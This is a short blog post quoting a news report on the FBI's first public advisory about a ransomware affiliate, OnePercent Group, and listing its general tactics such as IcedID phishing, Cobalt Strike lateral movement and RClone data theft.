Accurate, Focused Research on Law, Technology and Knowledge Discovery Since 2002

FBI sends its first-ever alert about a ‘ransomware affiliate’

The Record: “The US Federal Bureau of Investigations has published today its first-ever public advisory detailing the modus operandi of a “ransomware affiliate.” A relatively new term, a ransomware affiliate refers to a person or group who rents access to Ransomware-as-a-Service (RaaS) platforms, orchestrates intrusions into corporate networks, encrypt files with the “rented ransomware,” and then earn a commission from successful extortions. Going by the name of OnePercent Group, the FBI said today this threat actor has been active since at least November 2020. Per the FBI report [PDF], historically, the group has primarily relied on the following tactics for its attacks:

  • Used phishing email campaigns to infect victims with the IcedID trojan.
  • Used the IcedID trojan to deploy additional payloads on infected networks.
  • Used the Cobalt Strike penetration testing framework to move laterally across a victim’s network.
  • Used RClone to exfiltrate sensitive data from a victim’s servers.
  • Encrypted data and demanded a ransom.
  • Phoned or emailed victims to threaten to sell their stolen data on the dark web if they didn’t pay on time…”

Sorry, comments are closed for this post.